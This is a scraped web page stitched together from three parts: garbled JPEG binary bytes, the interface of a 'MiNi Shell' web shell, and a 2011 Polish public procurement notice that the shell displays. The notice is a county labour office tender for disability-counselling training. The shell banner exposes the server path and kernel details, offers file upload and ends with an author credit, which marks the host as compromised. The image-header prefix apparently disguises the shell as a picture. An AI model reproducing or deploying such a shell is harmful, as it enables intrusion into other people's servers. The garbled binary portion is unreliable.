JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/99360-N-2011.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Zorganizowanie i przeprowadzenie szkolenia zamkniętego lub otwartego Narzędzia 
i metody w pracy z osobami z niepełnosprawnością w tym z klientami z zaburzeniami psychicznymi dla 6 doradców zawodowych Powiatowego Urzędu Pracy w Ostrowcu Świętokrzyskim w ramach projektu: Eurokadra współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego,</b><br>
<b>Numer ogłoszenia: 99360 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Ostrowcu Świętokrzyskim , al. 3 Maja 36, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 0-41 26-54-208(09), faks 0-41 263-33-40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pup.ostrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia zamkniętego lub otwartego Narzędzia 
i metody w pracy z osobami z niepełnosprawnością w tym z klientami z zaburzeniami psychicznymi dla 6 doradców zawodowych Powiatowego Urzędu Pracy w Ostrowcu Świętokrzyskim w ramach projektu: Eurokadra współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia zamkniętego lub otwartego Narzędzia 
i metody w pracy z osobami z niepełnosprawnością w tym z klientami z zaburzeniami psychicznymi dla 6 doradców zawodowych Powiatowego Urzędu Pracy w Ostrowcu Świętokrzyskim w ramach projektu: Eurokadra współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie.

Kod zgodnie ze słownikiem CPV: 80510000-2, 80511000-9  .

1.	Celem szkolenia jest zapoznanie uczestników z problematyką osób 
z niepełnosprawnością.. Przygotowanie do prowadzenia poradnictwa zawodowego indywidualnego i grupowego dla osób z niepełnosprawnością. Zdobycie wiedzy na temat rodzajów przeciwwskazań zdrowotnych do pracy osób niepełnosprawnych. Zapoznanie 
z rodzajami zaburzeń psychicznych, przejawami oraz metodami wytłumiającymi niebezpieczne zachowania, oraz przeciwdziałającymi nieświadomym prowokacjom klienta.

2.	Ramowy program szkolenia stanowi załącznik nr 1 do SIWZ. 

3.	Szkolenie ma zostać przeprowadzone w jednej sześcioosobowj grupie.

4.	Szkolenie ma zostać zorganizowane i przeprowadzone pomiędzy 05 a 09 września 2011 r. 

5.	Proponowana liczba godzin około 40 dla grupy - według przedłożonego 
szczegółowego programu szkolenia.

6.	Czas trwania szkolenia 4 dni dla grupy.

7.	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby  
zajęcia odbywały się codziennie w dni powszednie.

8.	Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni 
ustawowo wolne od pracy.

9.	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 

10.	Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
      Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
przeprowadzenia  szkolenia: 
	- sprzęt audiowizualny (telewizor, magnetowid, bądź odtwarzacz DVD);
    - rzutnik pisma lub rzutnik multimedialny,
    - tablica flipchart z zapasem kartek lub tablica naścienna. 

11.	Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
przeprowadzenia szkolenia.

12.	Wykonawca zapewni warunki szkolenia oraz zakwaterowania zgodne z przepisami 
bezpieczeństwa i higieny pracy. 

13.	Wykonawca zapewni odpowiednią kadrę szkoleniową, opracuje szczegółowy 
harmonogram szkolenia.

14.	Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej 
z organizacją szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki ( dokument Ministerstwa Rozwoju Regionalnego z dnia 04 lutego 2009 r. zamieszczony na stronie www.efs.gov.pl  w zakładce: dokumenty i wytyczne). 

15.	Szkolenie jest traktowane przez Zamawiającego jako podnoszenie kwalifikacji zawodowych.  Po 	zakończeniu szkolenia Wykonawca zamówienia wyda uczestnikowi 
       szkolenia odpowiednie zaświadczenie na druku wydanie  zaświadczenia  na drukach 
      Ministra Edukacji Narodowej  zgodnie  z wzorem  określonym  w załączniku nr 1 
      do  Rozporządzenia   Ministra Edukacji i Nauki  z dnia 3 lutego 2006r. w sprawie 
      uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności 
      i  kwalifikacji zawodowych w formach pozaszkolnych zatwierdzonym przez Ministerstwo  
      Edukacji Narodowej oraz dodatkowo certyfikat)dyplom)zaświadczenie o ukończeniu  
       szkolenia zawierających logo Programu Operacyjnego Kapitał Ludzki , EFS i UE oraz 
       informację , iż szkolenie współfinansowane jest przez Unię Europejską  w ramach 
       środków Europejskiego Funduszu Społecznego oznakowane zgodnie z Wytycznymi   
       dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 
       zawierające poniższe dane:
		a) numer z rejestru,
		b) imię i nazwisko oraz numer PESEL uczestnika szkolenia,
		c) nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
		d) imię i nazwisko trenera z podaniem posiadanego tytułu naukowego,
		e) formę i nazwę szkolenia,
		f) okres trwania szkolenia,
		g) miejsce i datę wydania zaświadczenia lub innego dokumentu,				potwierdzającego ukończenie szkolenia, 
		h) tematy i wymiar godzin zajęć edukacyjnych,
		i) podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą 
		szkolenie.

16.	Wykonawca zapewni ubezpieczenie  NW dla uczestników szkolenia od pierwszego do   
ostatniego dnia szkolenia.  

17.	Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
nie dalej niż 300 km od granicy miasta Ostrowca Świętokrzyskiego.

18.	Wykonawca zapewni  zakwaterowanie (co najmniej 3 noclegi, w zależności od czasu trwania szkolenia ) dla  pracowników skierowanych na szkolenie. 

19.	Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym
lub pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych 
wyposażonych w pełny węzeł sanitarny.

20.	Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników 
szkolenia (śniadanie, obiad, kolacja) oraz serwis kawowy podczas trwania zajęć. 

21.	W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu 
rozpoczęcia szkolenia Wykonawca zapewni nocleg zgodny z w)w opisem oraz kolację
w przeddzień szkolenia i śniadanie w dniu rozpoczęcia szkolenia.

22.	Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników 
szkolenia lub w odległości nie większej niż 500 m od miejsca zakwaterowania. 
W przypadku gdy zajęcia odbywać się będą w odległości większej niż 500 m od miejsca 
zakwaterowania uczestników Wykonawca zapewni transport na i z miejsca odbywania  
zajęć.  

23.	Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót 
uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia. 

24.  Zamawiający przewiduje:   
      - ze strony Wykonawcy - możliwość zmiany trenerów prowadzących szkolenie, opiekuna   
      grupy, miejsca przeprowadzenia szkolenia,
      - ze strony Zamawiającego - możliwość zmiany terminów wykonania usługi, liczby 
      uczestników szkolenia przed jego rozpoczęciem. W przypadku zmiany  liczby 
      uczestników szkolenia Zamawiający dokona zapłaty za liczbę osób faktycznie 
      przeszkolonych (iloczyn faktycznej liczby osób przeszkolonych i kosztu przeszkolenia 
      jednej osoby).
-  w przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto 
      przedmiotu zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie zamierza udzielać zamówień uzupełniających</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego aktualnego odpisu z właściwego rejestru albo aktualne 
       zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy  
       wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej 
       wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
       Dokument można złożyć w formie oryginału lub kopii poświadczonej za zgodność
       z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy wskazaną 
       w zaświadczeniu o wpisie do ewidencji działalności gospodarczej lub w odpisie 
       z właściwego rejestru. W przypadku osób działających jako pełnomocnicy do oferty  
       należy dołączyć pełnomocnictwo w formie oryginału lub formie poświadczonej 
       notarialnie kopii.
-   Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
       publicznych - załącznik nr 2 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie w okresie ostatnich 3 lat  
       przed upływem terminu składania ofert a jeżeli  okres prowadzenia działalności jest 
       krótszy - w tym okresie przynajmniej trzech szkoleń o tej samej lub podobnej tematyce,
-	W celu wykazania spełniania przez Wykonawcę warunku posiadania wiedzy 
	i doświadczenia należy przedłożyć wykaz wykonanych co najmniej 2 usług 	szkoleniowych o tej samej lub podobnej tematyce,  w zakresie niezbędnym do 	wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat 	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 	krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania 
	i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały 	wykonane należycie 	wg wzoru określonego w załączniku nr 2A do SIWZ,
-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
     publicznych - załącznik nr 2 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
        publicznych - załącznik nr 2 do SIWZ,    
-   Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem 
        technicznym zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 3 
        do SIWZ. W przypadku użyczania przez Wykonawcę bazy szkoleniowej spełnienie 
        warunku nastąpi na podstawie złożonego przez Wykonawcę oświadczenia - załącznik 
        nr 3 do SIWZ
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień    
        publicznych - załącznik nr 2 do SIWZ,    

-      Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania   
        przedmiotu zamówienia - załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację 
       przedmiotu zamówienia, złożonego oświadczenia o nie zaleganiu z opłacaniem  
       podatków oraz o nie zaleganiu z opłacaniem opłat oraz składek na ubezpieczenie 
       zdrowotne i społeczne ewentualnie oświadczenie o uzyskaniu przewidzianym prawem 
       zwolnieniu, odroczeniu lub rozłożeniu na raty zaległych płatności - załącznik nr 5
       do  SIWZ.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia                              
dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Szczegółowy program szkolenia oznakowany zgodnie z Wytycznymi 
               dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał 
               Ludzki.
	
2. Wypełniony formularz oferty instytucji szkoleniowej - załącznik od nr 7 do SIWZ 

	3. Harmonogram szkolenia

	4. Zaparafowany projekt umowy, stanowiący załącznik nr 8 do SIWZ, jako 
	   potwierdzenie zaakceptowania warunków umowy.
	
5. Wzory dokumentów potwierdzających ukończenie szkolenia.

6. Wzór ankiety dla uczestników szkolenia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń grupowych (tj. grup liczących 6 i więcej osób) o tematyce tożsamej z przedmiotem zamówienia - 15</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, np:
      (ze strony Wykonawcy): trenerów prowadzących szkolenie, opiekuna grupy, miejsca 
      przeprowadzenia szkolenia, 
      (ze  strony  Zamawiającego) terminów wykonania usługi, liczby uczestników szkolenia 
      przed jego rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia  
      Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn 
      faktycznej liczby osób przeszkolonych i kosztu przeszkolenia jednej osoby).
3. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej 
     zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, 
     czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić 
     od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
     wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.ostrowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Ostrowcu Świętokrzyskim, ul. Aleja 3-go Maja 36
27-400 Ostrowiec Św..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2011 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Ostrowcu Św., Aleja 3-go Maja 36, 27-400 Ostrowiec Św., 
w pokoju nr 40 - II piętro ( SEKRETARIAT).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie realizowane w ramach projektu:Eurokadra współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com